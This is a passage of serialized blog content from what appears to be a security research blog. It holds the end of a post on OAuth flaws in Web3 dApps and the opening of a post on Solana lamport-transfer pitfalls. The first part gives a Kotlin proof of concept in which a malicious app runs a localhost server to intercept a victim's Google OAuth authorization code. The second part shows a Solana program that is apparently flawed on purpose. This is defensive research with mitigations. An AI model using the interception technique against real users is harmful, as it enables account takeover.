",{"type":28,"tag":116,"props":70325,"children":70326},{"style":370},[70327],{"type":33,"value":373},{"type":28,"tag":116,"props":70329,"children":70330},{"style":563},[70331],{"type":33,"value":70332}," \"https://accounts.google.com/o/oauth2/v2/auth?client_id=redacted&scope=openid%20email%20profile&response_type=code&redirect_uri=http%3A%2F%2Flocalhost%3A3000%2Fapi%2Fauth%2Fcallback%2Fgoogle&prompt=none&access_type=offline&state=2UTJ8naHVglSQQupa1jw1lugsaZr8f5M9hxZp7bxISM&code_challenge=e6_Onj804xizwJzVT5Pf8luKPbtLV-EJssR7I58UQp8&code_challenge_method=S256&service=lso&o2v=2&ddm=1&flowName=GeneralOAuthFlow\"\n",{"type":28,"tag":116,"props":70334,"children":70335},{"class":245,"line":1011},[70336,70340,70345,70349,70354,70359,70363],{"type":28,"tag":116,"props":70337,"children":70338},{"style":376},[70339],{"type":33,"value":70318},{"type":28,"tag":116,"props":70341,"children":70342},{"style":266},[70343],{"type":33,"value":70344}," browserIntent ",{"type":28,"tag":116,"props":70346,"children":70347},{"style":370},[70348],{"type":33,"value":373},{"type":28,"tag":116,"props":70350,"children":70351},{"style":282},[70352],{"type":33,"value":70353}," Intent",{"type":28,"tag":116,"props":70355,"children":70356},{"style":266},[70357],{"type":33,"value":70358},"(Intent.ACTION_VIEW, Uri.",{"type":28,"tag":116,"props":70360,"children":70361},{"style":282},[70362],{"type":33,"value":38833},{"type":28,"tag":116,"props":70364,"children":70365},{"style":266},[70366],{"type":33,"value":70367},"(googleOAuthUrl))\n",{"type":28,"tag":116,"props":70369,"children":70370},{"class":245,"line":1029},[70371,70376],{"type":28,"tag":116,"props":70372,"children":70373},{"style":282},[70374],{"type":33,"value":70375},"        startActivity",{"type":28,"tag":116,"props":70377,"children":70378},{"style":266},[70379],{"type":33,"value":70380},"(browserIntent)\n",{"type":28,"tag":116,"props":70382,"children":70383},{"class":245,"line":1038},[70384],{"type":28,"tag":116,"props":70385,"children":70386},{"style":266},[70387],{"type":33,"value":3025},{"type":28,"tag":116,"props":70389,"children":70390},{"class":245,"line":1047},[70391],{"type":28,"tag":116,"props":70392,"children":70393},{"emptyLinePlaceholder":19},[70394],{"type":33,"value":1044},{"type":28,"tag":116,"props":70396,"children":70397},{"class":245,"line":1071},[70398,70402,70406,70411],{"type":28,"tag":116,"props":70399,"children":70400},{"style":376},[70401],{"type":33,"value":2164},{"type":28,"tag":116,"props":70403,"children":70404},{"style":376},[70405],{"type":33,"value":5878},{"type":28,"tag":116,"props":70407,"children":70408},{"style":282},[70409],{"type":33,"value":70410}," startWebServer",{"type":28,"tag":116,"props":70412,"children":70413},{"style":266},[70414],{"type":33,"value":1068},{"type":28,"tag":116,"props":70416,"children":70417},{"class":245,"line":1137},[70418,70423,70428,70432,70437],{"type":28,"tag":116,"props":70419,"children":70420},{"style":282},[70421],{"type":33,"value":70422},"        embeddedServer",{"type":28,"tag":116,"props":70424,"children":70425},{"style":266},[70426],{"type":33,"value":70427},"(CIO, port ",{"type":28,"tag":116,"props":70429,"children":70430},{"style":370},[70431],{"type":33,"value":373},{"type":28,"tag":116,"props":70433,"children":70434},{"style":350},[70435],{"type":33,"value":70436}," 3000",{"type":28,"tag":116,"props":70438,"children":70439},{"style":266},[70440],{"type":33,"value":844},{"type":28,"tag":116,"props":70442,"children":70443},{"class":245,"line":1181},[70444,70449],{"type":28,"tag":116,"props":70445,"children":70446},{"style":282},[70447],{"type":33,"value":70448},"            routing",{"type":28,"tag":116,"props":70450,"children":70451},{"style":266},[70452],{"type":33,"value":1291},{"type":28,"tag":116,"props":70454,"children":70455},{"class":245,"line":1212},[70456,70461,70465,70470],{"type":28,"tag":116,"props":70457,"children":70458},{"style":376},[70459],{"type":33,"value":70460},"                get",{"type":28,"tag":116,"props":70462,"children":70463},{"style":266},[70464],{"type":33,"value":313},{"type":28,"tag":116,"props":70466,"children":70467},{"style":563},[70468],{"type":33,"value":70469},"\"{...}\"",{"type":28,"tag":116,"props":70471,"children":70472},{"style":266},[70473],{"type":33,"value":844},{"type":28,"tag":116,"props":70475,"children":70476},{"class":245,"line":1254},[70477,70482,70487],{"type":28,"tag":116,"props":70478,"children":70479},{"style":266},[70480],{"type":33,"value":70481},"                    call.",{"type":28,"tag":116,"props":70483,"children":70484},{"style":282},[70485],{"type":33,"value":70486},"respondHtml",{"type":28,"tag":116,"props":70488,"children":70489},{"style":266},[70490],{"type":33,"value":1291},{"type":28,"tag":116,"props":70492,"children":70493},{"class":245,"line":1262},[70494,70499],{"type":28,"tag":116,"props":70495,"children":70496},{"style":282},[70497],{"type":33,"value":70498},"                        head",{"type":28,"tag":116,"props":70500,"children":70501},{"style":266},[70502],{"type":33,"value":1291},{"type":28,"tag":116,"props":70504,"children":70505},{"class":245,"line":1294},[70506,70511,70516,70520,70525],{"type":28,"tag":116,"props":70507,"children":70508},{"style":282},[70509],{"type":33,"value":70510},"                            meta",{"type":28,"tag":116,"props":70512,"children":70513},{"style":266},[70514],{"type":33,"value":70515},"(charset ",{"type":28,"tag":116,"props":70517,"children":70518},{"style":370},[70519],{"type":33,"value":373},{"type":28,"tag":116,"props":70521,"children":70522},{"style":563},[70523],{"type":33,"value":70524}," \"UTF-8\"",{"type":28,"tag":116,"props":70526,"children":70527},{"style":266},[70528],{"type":33,"value":2830},{"type":28,"tag":116,"props":70530,"children":70531},{"class":245,"line":1334},[70532,70536,70541,70545,70550,70555,70559,70564],{"type":28,"tag":116,"props":70533,"children":70534},{"style":282},[70535],{"type":33,"value":70510},{"type":28,"tag":116,"props":70537,"children":70538},{"style":266},[70539],{"type":33,"value":70540},"(name ",{"type":28,"tag":116,"props":70542,"children":70543},{"style":370},[70544],{"type":33,"value":373},{"type":28,"tag":116,"props":70546,"children":70547},{"style":563},[70548],{"type":33,"value":70549}," \"viewport\"",{"type":28,"tag":116,"props":70551,"children":70552},{"style":266},[70553],{"type":33,"value":70554},", content ",{"type":28,"tag":116,"props":70556,"children":70557},{"style":370},[70558],{"type":33,"value":373},{"type":28,"tag":116,"props":70560,"children":70561},{"style":563},[70562],{"type":33,"value":70563}," \"width=device-width, initial-scale=1.0\"",{"type":28,"tag":116,"props":70565,"children":70566},{"style":266},[70567],{"type":33,"value":2830},{"type":28,"tag":116,"props":70569,"children":70570},{"class":245,"line":1372},[70571,70576,70580,70585],{"type":28,"tag":116,"props":70572,"children":70573},{"style":282},[70574],{"type":33,"value":70575},"                            title",{"type":28,"tag":116,"props":70577,"children":70578},{"style":266},[70579],{"type":33,"value":313},{"type":28,"tag":116,"props":70581,"children":70582},{"style":563},[70583],{"type":33,"value":70584},"\"OAuth Redirect\"",{"type":28,"tag":116,"props":70586,"children":70587},{"style":266},[70588],{"type":33,"value":2830},{"type":28,"tag":116,"props":70590,"children":70591},{"class":245,"line":1381},[70592],{"type":28,"tag":116,"props":70593,"children":70594},{"style":266},[70595],{"type":33,"value":70596},"                        }\n",{"type":28,"tag":116,"props":70598,"children":70599},{"class":245,"line":1389},[70600,70605],{"type":28,"tag":116,"props":70601,"children":70602},{"style":282},[70603],{"type":33,"value":70604},"                        body",{"type":28,"tag":116,"props":70606,"children":70607},{"style":266},[70608],{"type":33,"value":1291},{"type":28,"tag":116,"props":70610,"children":70611},{"class":245,"line":1425},[70612,70617,70621,70625,70630],{"type":28,"tag":116,"props":70613,"children":70614},{"style":282},[70615],{"type":33,"value":70616},"                            h1",{"type":28,"tag":116,"props":70618,"children":70619},{"style":266},[70620],{"type":33,"value":9254},{"type":28,"tag":116,"props":70622,"children":70623},{"style":370},[70624],{"type":33,"value":2268},{"type":28,"tag":116,"props":70626,"children":70627},{"style":563},[70628],{"type":33,"value":70629},"\"Google OAuth Redirect\"",{"type":28,"tag":116,"props":70631,"children":70632},{"style":266},[70633],{"type":33,"value":9264},{"type":28,"tag":116,"props":70635,"children":70636},{"class":245,"line":1448},[70637,70642],{"type":28,"tag":116,"props":70638,"children":70639},{"style":282},[70640],{"type":33,"value":70641},"                            script",{"type":28,"tag":116,"props":70643,"children":70644},{"style":266},[70645],{"type":33,"value":1291},{"type":28,"tag":116,"props":70647,"children":70648},{"class":245,"line":1456},[70649,70654],{"type":28,"tag":116,"props":70650,"children":70651},{"style":370},[70652],{"type":33,"value":70653},"                                +",{"type":28,"tag":116,"props":70655,"children":70656},{"style":563},[70657],{"type":33,"value":70658},"\"document.body.innerText = location.search;\"\n",{"type":28,"tag":116,"props":70660,"children":70661},{"class":245,"line":1520},[70662],{"type":28,"tag":116,"props":70663,"children":70664},{"style":266},[70665],{"type":33,"value":70666},"                            }\n",{"type":28,"tag":116,"props":70668,"children":70669},{"class":245,"line":1580},[70670],{"type":28,"tag":116,"props":70671,"children":70672},{"style":266},[70673],{"type":33,"value":70596},{"type":28,"tag":116,"props":70675,"children":70676},{"class":245,"line":1620},[70677],{"type":28,"tag":116,"props":70678,"children":70679},{"style":266},[70680],{"type":33,"value":70681},"                    }\n",{"type":28,"tag":116,"props":70683,"children":70684},{"class":245,"line":1668},[70685],{"type":28,"tag":116,"props":70686,"children":70687},{"style":266},[70688],{"type":33,"value":70689},"                }\n",{"type":28,"tag":116,"props":70691,"children":70692},{"class":245,"line":1677},[70693],{"type":28,"tag":116,"props":70694,"children":70695},{"style":266},[70696],{"type":33,"value":58503},{"type":28,"tag":116,"props":70698,"children":70699},{"class":245,"line":1685},[70700,70705,70710,70715,70719,70723],{"type":28,"tag":116,"props":70701,"children":70702},{"style":266},[70703],{"type":33,"value":70704},"        }.",{"type":28,"tag":116,"props":70706,"children":70707},{"style":282},[70708],{"type":33,"value":70709},"start",{"type":28,"tag":116,"props":70711,"children":70712},{"style":266},[70713],{"type":33,"value":70714},"(wait ",{"type":28,"tag":116,"props":70716,"children":70717},{"style":370},[70718],{"type":33,"value":373},{"type":28,"tag":116,"props":70720,"children":70721},{"style":376},[70722],{"type":33,"value":1129},{"type":28,"tag":116,"props":70724,"children":70725},{"style":266},[70726],{"type":33,"value":2830},{"type":28,"tag":116,"props":70728,"children":70729},{"class":245,"line":1729},[70730],{"type":28,"tag":116,"props":70731,"children":70732},{"style":266},[70733],{"type":33,"value":3025},{"type":28,"tag":116,"props":70735,"children":70736},{"class":245,"line":1764},[70737],{"type":28,"tag":116,"props":70738,"children":70739},{"style":266},[70740],{"type":33,"value":406},{"type":28,"tag":29,"props":70742,"children":70743},{},[70744],{"type":33,"value":70745},"The code essentially creates a localhost web server and redirects the user to the OAuth authorization screen, which can be automatically bypassed under certain conditionswithout any user interaction. Once the authorization process is completed, the OAuth flow redirects the user back to the localhost server, including the secret authorization token in the query string.",{"type":28,"tag":29,"props":70747,"children":70748},{},[70749],{"type":33,"value":70750},"Since the attacker controls the localhost server, they can intercept and extract the token, enabling them to take over the victim's account.",{"type":28,"tag":75,"props":70752,"children":70754},{"id":70753},"mitigation-1",[70755],{"type":33,"value":39956},{"type":28,"tag":29,"props":70757,"children":70758},{},[70759,70761,70766],{"type":33,"value":70760},"As a mitigation measure, it is crucial to ensure that localhost servers are not whitelisted in the OAuth ",{"type":28,"tag":98,"props":70762,"children":70764},{"className":70763},[],[70765],{"type":33,"value":69386},{"type":33,"value":70767}," parameter. If whitelisting localhost is necessary due to specific business requirements, a custom solution must be carefully designed and implemented to safeguard the account security of all users.",{"type":28,"tag":63,"props":70769,"children":70770},{"id":2506},[70771],{"type":33,"value":2509},{"type":28,"tag":29,"props":70773,"children":70774},{},[70775],{"type":33,"value":70776},"In this article, we explored three lesser-known classes of vulnerabilities present in Web2 authentication flows utilized by Web3 dApps, shedding light on critical but often overlooked security risks. Authentication processes are inherently complex, and this complexity leaves room for vulnerabilities to persist unnoticed in applications.",{"type":28,"tag":29,"props":70778,"children":70779},{},[70780],{"type":33,"value":70781},"By uncovering and analyzing these vulnerabilities, we aim to stress the necessity of adopting a robust, holistic approach to authentication security. As Web3 continues to evolve, bridging the gap between traditional Web2 frameworks and the decentralized Web3 ecosystem is not just an opportunity but an imperative to safeguard users and their data.",{"type":28,"tag":2516,"props":70783,"children":70784},{},[70785],{"type":33,"value":2520},{"title":7,"searchDepth":256,"depth":256,"links":70787},[70788,70795,70800,70803],{"id":69154,"depth":256,"text":69157,"children":70789},[70790,70791,70792,70793,70794],{"id":69165,"depth":293,"text":69168},{"id":69192,"depth":293,"text":69195},{"id":69253,"depth":293,"text":69256},{"id":69310,"depth":293,"text":69313},{"id":69409,"depth":293,"text":69412},{"id":69455,"depth":256,"text":69458,"children":70796},[70797,70798,70799],{"id":69461,"depth":293,"text":69464},{"id":69488,"depth":293,"text":69491},{"id":39953,"depth":293,"text":39956},{"id":69936,"depth":256,"text":69939,"children":70801},[70802],{"id":70753,"depth":293,"text":39956},{"id":2506,"depth":256,"text":2509},"content:blog:2025-03-07-subverting-web2-authentication-in-web3.md","blog/2025-03-07-subverting-web2-authentication-in-web3.md","blog/2025-03-07-subverting-web2-authentication-in-web3",{"_path":70808,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":70809,"description":70810,"author":40072,"image":70811,"date":70813,"isFeatured":19,"tags":70814,"onBlogPage":19,"body":70815,"_type":2534,"_id":75469,"_source":2536,"_file":75470,"_stem":75471,"_extension":2539},"/blog/2025-05-14-king-of-the-sol","Solana: The hidden dangers of lamport transfers","Solana’s lamport transfer logic hides dangerous edge cases — from rent-exemption quirks to write-demotion traps. We dissect a deceptively simple smart contract game to expose how transfers to arbitrary accounts can silently fail, brick your program, or crown an eternal king.",{"src":70812,"height":18,"width":18},"/posts/king-of-the-sol/king-of-the-sol.png","2025-05-14",[2551],{"type":25,"children":70816,"toc":75458},[70817,70821,70826,70840,70846,70851,70881,70886,70891,71929,71934,71942,71947,71953,71959,71971,72004,72016,72029,72041,72486,72491,72537,72543,72548,72635,72640,72654,72667,73330,73335,73347,73353,73364,73376,73530,73544,73563,73584,73590,73595,73940,73945,73951,73970,73984,74606,74611,74631,74636,74641,74647,74659,74680,74855,74861,74866,75167,75188,75200,75212,75296,75316,75328,75334,75346,75352,75357,75380,75392,75398,75410,75415,75421,75426,75431,75449,75454],{"type":28,"tag":63,"props":70818,"children":70819},{"id":28670},[70820],{"type":33,"value":28673},{"type":28,"tag":29,"props":70822,"children":70823},{},[70824],{"type":33,"value":70825},"Is it safe to transfer lamports to an arbitrary address on Solana? The answer might surprise you.",{"type":28,"tag":29,"props":70827,"children":70828},{},[70829,70831,70838],{"type":33,"value":70830},"In this post, we explore a deceptively simple smart contract game inspired by ",{"type":28,"tag":87,"props":70832,"children":70835},{"href":70833,"rel":70834},"https://www.kingoftheether.com/thrones/kingoftheether/index.html",[91],[70836],{"type":33,"value":70837},"King of the Ether",{"type":33,"value":70839},". Through it, we’ll highlight subtle pitfalls in Solana’s account model that can brick your program — especially when it comes to transferring lamports.",{"type":28,"tag":63,"props":70841,"children":70843},{"id":70842},"the-game-king-of-the-sol",[70844],{"type":33,"value":70845},"The Game: King of the SOL",{"type":28,"tag":29,"props":70847,"children":70848},{},[70849],{"type":33,"value":70850},"The game works like this:",{"type":28,"tag":2108,"props":70852,"children":70853},{},[70854,70866,70871,70876],{"type":28,"tag":459,"props":70855,"children":70856},{},[70857,70859,70864],{"type":33,"value":70858},"Anyone can become the ",{"type":28,"tag":4995,"props":70860,"children":70861},{},[70862],{"type":33,"value":70863},"king",{"type":33,"value":70865}," by bidding at least 2× the previous bid.",{"type":28,"tag":459,"props":70867,"children":70868},{},[70869],{"type":33,"value":70870},"The old king is reimbursed 95% of their bid.",{"type":28,"tag":459,"props":70872,"children":70873},{},[70874],{"type":33,"value":70875},"The remaining 5% goes into a prize pot.",{"type":28,"tag":459,"props":70877,"children":70878},{},[70879],{"type":33,"value":70880},"If the reigning king survives for 10 days without being dethroned, they can claim the entire pot.",{"type":28,"tag":29,"props":70882,"children":70883},{},[70884],{"type":33,"value":70885},"Simple, right?",{"type":28,"tag":29,"props":70887,"children":70888},{},[70889],{"type":33,"value":70890},"This is the core logic:",{"type":28,"tag":234,"props":70892,"children":70894},{"className":2652,"code":70893,"language":2651,"meta":7,"style":7},"#[derive(Accounts)]\npub struct ChangeKing\u003C'info> {\n    #[account(mut)]\n    pub throne: Account\u003C'info, Throne>,\n\n    /// CHECK: old_king gets a 95% refund, so ensure its writable.\n    #[account(mut, constraint = old_king.key() == throne.king)]\n    pub old_king: AccountInfo\u003C'info>,\n\n    /// CHECK: any writable account is allowed as a new king.\n    #[account(mut)]\n    pub new_king: AccountInfo\u003C'info>,\n\n    #[account(mut)]\n    pub payer: Signer\u003C'info>,\n}\n\n#[program]\npub mod king_of_the_sol {\n    pub fn change_king(ctx: Context\u003CChangeKing>, bid_amount: u64) -> Result\u003C()> {\n        // Check that bid_amount is at least 2x last_bid_amount\n        assert!(bid_amount >= ctx.accounts.throne.last_bid_amount * 2);\n        transfer_from_signer(\n            &ctx.accounts.payer,\n            &ctx.accounts.throne.to_account_info(),\n            bid_amount,\n        )?;\n\n        // Reimburse 95% of the last bid to the old king\n        let to_reimburse = (ctx.accounts.throne.last_bid_amount * 9500) / 10000;\n        transfer_from_pda(\n            &ctx.accounts.throne.to_account_info(),\n            &ctx.accounts.old_king,\n            to_reimburse,\n        )?;\n\n        // Set new king\n        ctx.accounts.throne.king = ctx.accounts.new_king.key();\n        ctx.accounts.throne.last_bid_amount = bid_amount;\n        ctx.accounts.throne.last_time = Clock::get()?.unix_timestamp as u64;\n\n        Ok(())\n    }\n}\n",[70895],{"type":28,"tag":98,"props":70896,"children":70897},{"__ignoreMap":7},[70898,70913,70941,70956,70997,71004,71012,71063,71094,71101,71109,71124,71156,71163,71178,71209,71216,71223,71231,71248,71322,71330,71391,71403,71431,71471,71483,71499,71506,71514,71588,71600,71639,71667,71679,71694,71701,71709,71779,71823,71897,71904,71915,71922],{"type":28,"tag":116,"props":70899,"children":70900},{"class":245,"line":246},[70901,70905,70909],{"type":28,"tag":116,"props":70902,"children":70903},{"style":266},[70904],{"type":33,"value":22500},{"type":28,"tag":116,"props":70906,"children":70907},{"style":339},[70908],{"type":33,"value":22505},{"type":28,"tag":116,"props":70910,"children":70911},{"style":266},[70912],{"type":33,"value":19922},{"type":28,"tag":116,"props":70914,"children":70915},{"class":245,"line":256},[70916,70920,70924,70929,70933,70937],{"type":28,"tag":116,"props":70917,"children":70918},{"style":376},[70919],{"type":33,"value":13356},{"type":28,"tag":116,"props":70921,"children":70922},{"style":376},[70923],{"type":33,"value":20814},{"type":28,"tag":116,"props":70925,"children":70926},{"style":339},[70927],{"type":33,"value":70928}," ChangeKing",{"type":28,"tag":116,"props":70930,"children":70931},{"style":266},[70932],{"type":33,"value":22585},{"type":28,"tag":116,"props":70934,"children":70935},{"style":339},[70936],{"type":33,"value":22590},{"type":28,"tag":116,"props":70938,"children":70939},{"style":266},[70940],{"type":33,"value":6952},{"type":28,"tag":116,"props":70942,"children":70943},{"class":245,"line":293},[70944,70948,70952],{"type":28,"tag":116,"props":70945,"children":70946},{"style":266},[70947],{"type":33,"value":22792},{"type":28,"tag":116,"props":70949,"children":70950},{"style":376},[70951],{"type":33,"value":3394},{"type":28,"tag":116,"props":70953,"children":70954},{"style":266},[70955],{"type":33,"value":19922},{"type":28,"tag":116,"props":70957,"children":70958},{"class":245,"line":361},[70959,70963,70968,70972,70976,70980,70984,70988,70993],{"type":28,"tag":116,"props":70960,"children":70961},{"style":376},[70962],{"type":33,"value":20506},{"type":28,"tag":116,"props":70964,"children":70965},{"style":272},[70966],{"type":33,"value":70967}," throne",{"type":28,"tag":116,"props":70969,"children":70970},{"style":370},[70971],{"type":33,"value":4160},{"type":28,"tag":116,"props":70973,"children":70974},{"style":339},[70975],{"type":33,"value":22757},{"type":28,"tag":116,"props":70977,"children":70978},{"style":266},[70979],{"type":33,"value":22585},{"type":28,"tag":116,"props":70981,"children":70982},{"style":339},[70983],{"type":33,"value":22590},{"type":28,"tag":116,"props":70985,"children":70986},{"style":266},[70987],{"type":33,"value":825},{"type":28,"tag":116,"props":70989,"children":70990},{"style":339},[70991],{"type":33,"value":70992},"Throne",{"type":28,"tag":116,"props":70994,"children":70995},{"style":266},[70996],{"type":33,"value":5809},{"type":28,"tag":116,"props":70998,"children":70999},{"class":245,"line":387},[71000],{"type":28,"tag":116,"props":71001,"children":71002},{"emptyLinePlaceholder":19},[71003],{"type":33,"value":1044},{"type":28,"tag":116,"props":71005,"children":71006},{"class":245,"line":400},[71007],{"type":28,"tag":116,"props":71008,"children":71009},{"style":250},[71010],{"type":33,"value":71011},"    /// CHECK: old_king gets a 95% refund, so ensure its writable.\n",{"type":28,"tag":116,"props":71013,"children":71014},{"class":245,"line":614},[71015,71019,71023,71028,71032,71037,71041,71046,71050,71054,71058],{"type":28,"tag":116,"props":71016,"children":71017},{"style":266},[71018],{"type":33,"value":22792},{"type":28,"tag":116,"props":71020,"children":71021},{"style":376},[71022],{"type":33,"value":3394},{"type":28,"tag":116,"props":71024,"children":71025},{"style":266},[71026],{"type":33,"value":71027},", constraint ",{"type":28,"tag":116,"props":71029,"children":71030},{"style":370},[71031],{"type":33,"value":373},{"type":28,"tag":116,"props":71033,"children":71034},{"style":266},[71035],{"type":33,"value":71036}," old_king",{"type":28,"tag":116,"props":71038,"children":71039},{"style":370},[71040],{"type":33,"value":141},{"type":28,"tag":116,"props":71042,"children":71043},{"style":266},[71044],{"type":33,"value":71045},"key() ",{"type":28,"tag":116,"props":71047,"children":71048},{"style":370},[71049],{"type":33,"value":2340},{"type":28,"tag":116,"props":71051,"children":71052},{"style":266},[71053],{"type":33,"value":70967},{"type":28,"tag":116,"props":71055,"children":71056},{"style":370},[71057],{"type":33,"value":141},{"type":28,"tag":116,"props":71059,"children":71060},{"style":266},[71061],{"type":33,"value":71062},"king)]\n",{"type":28,"tag":116,"props":71064,"children":71065},{"class":245,"line":631},[71066,71070,71074,71078,71082,71086,71090],{"type":28,"tag":116,"props":71067,"children":71068},{"style":376},[71069],{"type":33,"value":20506},{"type":28,"tag":116,"props":71071,"children":71072},{"style":272},[71073],{"type":33,"value":71036},{"type":28,"tag":116,"props":71075,"children":71076},{"style":370},[71077],{"type":33,"value":4160},{"type":28,"tag":116,"props":71079,"children":71080},{"style":339},[71081],{"type":33,"value":25053},{"type":28,"tag":116,"props":71083,"children":71084},{"style":266},[71085],{"type":33,"value":22585},{"type":28,"tag":116,"props":71087,"children":71088},{"style":339},[71089],{"type":33,"value":22590},{"type":28,"tag":116,"props":71091,"children":71092},{"style":266},[71093],{"type":33,"value":5809},{"type":28,"tag":116,"props":71095,"children":71096},{"class":245,"line":665},[71097],{"type":28,"tag":116,"props":71098,"children":71099},{"emptyLinePlaceholder":19},[71100],{"type":33,"value":1044},{"type":28,"tag":116,"props":71102,"children":71103},{"class":245,"line":713},[71104],{"type":28,"tag":116,"props":71105,"children":71106},{"style":250},[71107],{"type":33,"value":71108},"    /// CHECK: any writable account is allowed as a new king.\n",{"type":28,"tag":116,"props":71110,"children":71111},{"class":245,"line":750},[71112,71116,71120],{"type":28,"tag":116,"props":71113,"children":71114},{"style":266},[71115],{"type":33,"value":22792},{"type":28,"tag":116,"props":71117,"children":71118},{"style":376},[71119],{"type":33,"value":3394},{"type":28,"tag":116,"props":71121,"children":71122},{"style":266},[71123],{"type":33,"value":19922},{"type":28,"tag":116,"props":71125,"children":71126},{"class":245,"line":779},[71127,71131,71136,71140,71144,71148,71152],{"type":28,"tag":116,"props":71128,"children":71129},{"style":376},[71130],{"type":33,"value":20506},{"type":28,"tag":116,"props":71132,"children":71133},{"style":272},[71134],{"type":33,"value":71135}," new_king",{"type":28,"tag":116,"props":71137,"children":71138},{"style":370},[71139],{"type":33,"value":4160},{"type":28,"tag":116,"props":71141,"children":71142},{"style":339},[71143],{"type":33,"value":25053},{"type":28,"tag":116,"props":71145,"children":71146},{"style":266},[71147],{"type":33,"value":22585},{"type":28,"tag":116,"props":71149,"children":71150},{"style":339},[71151],{"type":33,"value":22590},{"type":28,"tag":116,"props":71153,"children":71154},{"style":266},[71155],{"type":33,"value":5809},{"type":28,"tag":116,"props":71157,"children":71158},{"class":245,"line":796},[71159],{"type":28,"tag":116,"props":71160,"children":71161},{"emptyLinePlaceholder":19},[71162],{"type":33,"value":1044},{"type":28,"tag":116,"props":71164,"children":71165},{"class":245,"line":847},[71166,71170,71174],{"type":28,"tag":116,"props":71167,"children":71168},{"style":266},[71169],{"type":33,"value":22792},{"type":28,"tag":116,"props":71171,"children":71172},{"style":376},[71173],{"type":33,"value":3394},{"type":28,"tag":116,"props":71175,"children":71176},{"style":266},[71177],{"type":33,"value":19922},{"type":28,"tag":116,"props":71179,"children":71180},{"class":245,"line":898},[71181,71185,71189,71193,71197,71201,71205],{"type":28,"tag":116,"props":71182,"children":71183},{"style":376},[71184],{"type":33,"value":20506},{"type":28,"tag":116,"props":71186,"children":71187},{"style":272},[71188],{"type":33,"value":41862},{"type":28,"tag":116,"props":71190,"children":71191},{"style":370},[71192],{"type":33,"value":4160},{"type":28,"tag":116,"props":71194,"children":71195},{"style":339},[71196],{"type":33,"value":22821},{"type":28,"tag":116,"props":71198,"children":71199},{"style":266},[71200],{"type":33,"value":22585},{"type":28,"tag":116,"props":71202,"children":71203},{"style":339},[71204],{"type":33,"value":22590},{"type":28,"tag":116,"props":71206,"children":71207},{"style":266},[71208],{"type":33,"value":5809},{"type":28,"tag":116,"props":71210,"children":71211},{"class":245,"line":907},[71212],{"type":28,"tag":116,"props":71213,"children":71214},{"style":266},[71215],{"type":33,"value":406},{"type":28,"tag":116,"props":71217,"children":71218},{"class":245,"line":981},[71219],{"type":28,"tag":116,"props":71220,"children":71221},{"emptyLinePlaceholder":19},[71222],{"type":33,"value":1044},{"type":28,"tag":116,"props":71224,"children":71225},{"class":245,"line":1011},[71226],{"type":28,"tag":116,"props":71227,"children":71228},{"style":266},[71229],{"type":33,"value":71230},"#[program]\n",{"type":28,"tag":116,"props":71232,"children":71233},{"class":245,"line":1029},[71234,71238,71243],{"type":28,"tag":116,"props":71235,"children":71236},{"style":376},[71237],{"type":33,"value":13356},{"type":28,"tag":116,"props":71239,"children":71240},{"style":376},[71241],{"type":33,"value":71242}," mod",{"type":28,"tag":116,"props":71244,"children":71245},{"style":266},[71246],{"type":33,"value":71247}," king_of_the_sol {\n",{"type":28,"tag":116,"props":71249,"children":71250},{"class":245,"line":1038},[71251,71255,71259,71264,71268,71272,71276,71280,71284,71289,71293,71298,71302,71306,71310,71314,71318],{"type":28,"tag":116,"props":71252,"children":71253},{"style":376},[71254],{"type":33,"value":20506},{"type":28,"tag":116,"props":71256,"children":71257},{"style":376},[71258],{"type":33,"value":13361},{"type":28,"tag":116,"props":71260,"children":71261},{"style":282},[71262],{"type":33,"value":71263}," change_king",{"type":28,"tag":116,"props":71265,"children":71266},{"style":266},[71267],{"type":33,"value":313},{"type":28,"tag":116,"props":71269,"children":71270},{"style":272},[71271],{"type":33,"value":19944},{"type":28,"tag":116,"props":71273,"children":71274},{"style":370},[71275],{"type":33,"value":4160},{"type":28,"tag":116,"props":71277,"children":71278},{"style":339},[71279],{"type":33,"value":19953},{"type":28,"tag":116,"props":71281,"children":71282},{"style":266},[71283],{"type":33,"value":514},{"type":28,"tag":116,"props":71285,"children":71286},{"style":339},[71287],{"type":33,"value":71288},"ChangeKing",{"type":28,"tag":116,"props":71290,"children":71291},{"style":266},[71292],{"type":33,"value":6302},{"type":28,"tag":116,"props":71294,"children":71295},{"style":272},[71296],{"type":33,"value":71297},"bid_amount",{"type":28,"tag":116,"props":71299,"children":71300},{"style":370},[71301],{"type":33,"value":4160},{"type":28,"tag":116,"props":71303,"children":71304},{"style":339},[71305],{"type":33,"value":5531},{"type":28,"tag":116,"props":71307,"children":71308},{"style":266},[71309],{"type":33,"value":1609},{"type":28,"tag":116,"props":71311,"children":71312},{"style":370},[71313],{"type":33,"value":13423},{"type":28,"tag":116,"props":71315,"children":71316},{"style":339},[71317],{"type":33,"value":13428},{"type":28,"tag":116,"props":71319,"children":71320},{"style":266},[71321],{"type":33,"value":19995},{"type":28,"tag":116,"props":71323,"children":71324},{"class":245,"line":1047},[71325],{"type":28,"tag":116,"props":71326,"children":71327},{"style":250},[71328],{"type":33,"value":71329},"        // Check that bid_amount is at least 2x last_bid_amount\n",{"type":28,"tag":116,"props":71331,"children":71332},{"class":245,"line":1071},[71333,71337,71341,71345,71349,71353,71357,71361,71365,71370,71374,71379,71383,71387],{"type":28,"tag":116,"props":71334,"children":71335},{"style":282},[71336],{"type":33,"value":64067},{"type":28,"tag":116,"props":71338,"children":71339},{"style":266},[71340],{"type":33,"value":313},{"type":28,"tag":116,"props":71342,"children":71343},{"style":272},[71344],{"type":33,"value":71297},{"type":28,"tag":116,"props":71346,"children":71347},{"style":370},[71348],{"type":33,"value":7974},{"type":28,"tag":116,"props":71350,"children":71351},{"style":272},[71352],{"type":33,"value":25498},{"type":28,"tag":116,"props":71354,"children":71355},{"style":370},[71356],{"type":33,"value":141},{"type":28,"tag":116,"props":71358,"children":71359},{"style":266},[71360],{"type":33,"value":14341},{"type":28,"tag":116,"props":71362,"children":71363},{"style":370},[71364],{"type":33,"value":141},{"type":28,"tag":116,"props":71366,"children":71367},{"style":266},[71368],{"type":33,"value":71369},"throne",{"type":28,"tag":116,"props":71371,"children":71372},{"style":370},[71373],{"type":33,"value":141},{"type":28,"tag":116,"props":71375,"children":71376},{"style":266},[71377],{"type":33,"value":71378},"last_bid_amount 